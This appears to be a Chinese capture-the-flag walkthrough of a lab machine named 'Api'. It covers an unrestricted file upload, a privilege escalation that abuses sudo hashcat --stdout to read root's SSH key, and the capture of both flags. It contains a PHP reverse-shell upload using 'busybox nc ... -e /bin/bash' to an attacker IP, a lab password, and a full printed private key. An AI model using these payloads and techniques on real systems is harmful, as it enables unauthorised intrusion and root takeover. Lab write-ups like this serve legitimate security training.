Api

通过抓包,查看返回包,找到一个路径/backend-api

访问/backend-api,存在文件code.phpfile.phpuploads

访问file.php,故需要构造文件上传的数据包

1
2
3
4
5
6
7
{

-   "status": "error",
-   "message": "仅支持POST请求",
-   "hint": "请使用POST方法发送请求。"

}

文件上传数据包构造

根据 RFC 1867 协议,文件上传请求体需包含以下结构

1
2
3
4
5
6
7
8
9
10
POST /upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123

------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

<文件二进制内容>
------WebKitFormBoundaryABC123--

正确构造 multipart/form-data格式的文件上传数据包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /backend-api/file.php HTTP/1.1
Host: 192.168.2.24
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://192.168.2.24/backend-api/
Cookie: PHPSESSID=glpbe525b95iu26pc1hal761j8
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123
Content-Length: 233

------WebKitFormBoundaryABC123
Content-Disposition: form-data; name="file"; filename="rev.php"
Content-Type: text/plain

<?php
  exec("busybox nc 192.168.2.4 4444 -e /bin/bash");
?>

------WebKitFormBoundaryABC123--

成功进行上传

获取到web权限

反弹shell,成功获取到web权限

获取xiaozhihuaa的权限

查看login.php,找到一个模拟的账号密码root:0tmyxZKD1szqdAYe

使用密码0tmyxZKD1szqdAYe成功切换到xiaozhihuaa用户

1
2
3
4
www-data@Api:/var/www/html$ su xiaozhihuaa
Password: 
xiaozhihuaa@Api:/var/www/html$ id
uid=1000(xiaozhihuaa) gid=1000(xiaozhihuaa) groups=1000(xiaozhihuaa)

hashcat提权

查看sudo,发现hashcat不需要root密码即可执行root权限

1
2
3
4
5
6
7
xiaozhihuaa@Api:/var/www/html$ sudo -l
Matching Defaults entries for xiaozhihuaa on Api:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User xiaozhihuaa may run the following commands on Api:
    (ALL) NOPASSWD: /usr/bin/hashcat

查看hashcat的命令参数,发现--stdout参数可以不破解哈希值,仅打印候选哈希值,即可读取文件内容。
读取root用户的ssh的私钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
xiaozhihuaa@Api:/tmp$ sudo /usr/bin/hashcat --stdout /root/.ssh/id_rsa      
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAxBsbwOv96P8ZVQhlo8535L/JWrghUakeplu98FfLqdE6l1ZE0BOB
c4xwp8+BNEKDz/HYiOx/NkulCxqrX1zrQdt0AV4bVHKoLQK+r7TaR66cnlel9d5Ig0BAiL
eY4DPTEs7ZxzCEJvWNPQWe4WugPaGfo9rmqTF9TgZl0lhC3zgdFq1A6BPUnR/yoEm0yfrg
mJOvrSaJkxkvd4y+XXu1dpd6NuEWgqfKaXPCjonU081zvMEs7Ikp9Q7OwuwRg2g/T6oHgw
9pMUnkPEPRw4xhopL/hVkedyRlj680nxL1WYlFsHC3GqhRnrMR/zMVCjTU+UnpOEhPRE7y
m3PAgbpgE0rzDOzB8gv4awY9QqnB4H7TApHMsVmesrxqNn0WTbSjqIDQRCS8aAXoWkHn3r
GwRfljZZRSd16AAwnfwiN4S0n4uKgvVvCIQiFbrqR2C+gyQFm+kAcOIwT9yzbQmFqnsE6J
Jda7ZWmCy1Bsr1Muj/T9Q58Z35VsZV6aYcpj06ofAAAFgG+tTntvrU57AAAAB3NzaC1yc2
EAAAGBAMQbG8Dr/ej/GVUIZaPOd+S/yVq4IVGpHqZbvfBXy6nROpdWRNATgXOMcKfPgTRC
g8/x2IjsfzZLpQsaq19c60HbdAFeG1RyqC0Cvq+02keunJ5XpfXeSINAQIi3mOAz0xLO2c
cwhCb1jT0FnuFroD2hn6Pa5qkxfU4GZdJYQt84HRatQOgT1J0f8qBJtMn64JiTr60miZMZ
L3eMvl17tXaXejbhFoKnymlzwo6J1NPNc7zBLOyJKfUOzsLsEYNoP0+qB4MPaTFJ5DxD0c
OMYaKS/4VZHnckZY+vNJ8S9VmJRbBwtxqoUZ6zEf8zFQo01PlJ6ThIT0RO8ptzwIG6YBNK
8wzswfIL+GsGPUKpweB+0wKRzLFZnrK8ajZ9Fk20o6iA0EQkvGgF6FpB596xsEX5Y2WUUn
degAMJ38IjeEtJ+LioL1bwiEIhW66kdgvoMkBZvpAHDiME/cs20Jhap7BOiSXWu2VpgstQ
bK9TLo/0/UOfGd+VbGVemmHKY9OqHwAAAAMBAAEAAAGAPeO8R49y67SOfxqOUTsY9XVdi6
buxQHVrXTopdBfczGYByjvwKdXRGs/JobDZQXU6ayOxO+2WiFXbgC1svv1NyyWGNRlVap1
zva9zWALP3Io9YP92XGUeu+tLjibI67XX2kuq8FxA4adU3PRp5y6zpiSdDjicOUwgY5dVh
wKxr3D2GNHR7byc8AgZ1u7lb76YMzDNaci5eyd4WHmtkQTieDWbjltTEC+Dbe94BQ5ubpu
W1Sv49qKBk/tCvFLuagNPN+1FD9qZZWrawdCNB5kQu62RYUCmuiegrzf7AcAWGcDYgefqm
Qihl6GWgMjOXsJ9YDKJSo4Se4Kdq8mnrYJU/MyJYA0zblmpTiYIIUEfoSdiW0PDBvZxpA9
7ufLf+vttGFW8RFrgr96R470dFIEzeLxSbNSuPqKd8KdPkWdEBu1s9+EKhJppg9W1vTTV6
95bFBD6GFA3Zv7MuzSyg/wPpNiwJPM2BBTN5TueN92+BgW6mN6xjtM2OEIKCTythmBAAAA
wB+d89CyX0FBPS0U8OTTy7woL+ZmpkHY2MSFNY7N6+wtT4XPlDYtmzvkElheAYNEiwZdaT
SLAwbes4dn8WmjBVXHkya+JAAEQrMskJJAX6WzEHWUQWkgbB4ljLyPcRNtebVCYEA+GIh6
KTJNLqcp5Q7VSTEiqJoP0NGUyF5F8JFstQmQfr55nujmci7xalGNtZYvsmXFHUmMoWzK7M
xj0vVfq8k3BuOSdlfzSeV4VytMdv7+rC85fTTYJXuDNBkOUgAAAMEA+E9qQy6XLp3MceWE
HOPnuWyg8Mf0Vc9FJkcGa9XEXmPvucz7vSMQ4T+fXoRfEwUGopl70XYCZ3S7QbTgBGD6Fv
xYVdDVufQqqiq9QKQToPVWQjXUbaWuMlVLyctD5EJuWoATM7kLSbiUPNfHZX/kCrMdcvaD
xdfq0x2+okMB6N8+hJ8RoSGx5ll0hfBwMWteOL1RkG+PiwaDMhAqEpmB/oP4F2HxsQgFFa
T0CqO9Zm+Iwbfdn2BUNLmxyuWnBtXBAAAAwQDKLdJDGkFoASZZlxzBhZrH550rZ+jQ7T0V
56JGnEgYzCXEAP+s75M3WsIrhm6dddgCz6wLNmPVSSleG3FuAW6ss7nPkxzNCf+Z+jEDtC
avagxaPTGkxF2XEMGUnWTzT83NQOYHK5t7Efd1N2E0D7WIYD0aNDLr1PzObN2lEiQN0h4O
ZLuDf9lJPWPB/O8V06QxrEpu1ktBG3G2ZfbHRV7MDFK/4M/YbxDEA2YnbXw7pBa+TLcGZF
zLlbvIB7ezN98AAAAIcm9vdEBBcGkBAgM=
-----END OPENSSH PRIVATE KEY-----

直接使用root用户的私钥进行连接

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/tmp]
└─# ssh root@192.168.2.24 -i id
Linux Api 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 10 22:54:08 2025 from 192.168.2.4
root@Api:~# id
uid=0(root) gid=0(root) groups=0(root)

查看flag

1
2
3
root@Api:~# cat /home/xiaozhihuaa/user.txt /root/root.txt 
flag{user-7a1b1a56f991412e9b0c1d8e02a5f945}
flag{root-9f48a1abe48a40c5bf1830b233775a3c}
Maze-sec
#文件上传,sudo-hashcat
Api
http://miao-sec.github.io/Maze-sec/Api/
作者
Miao
发布于
2026年1月9日
许可协议
BY-MIAO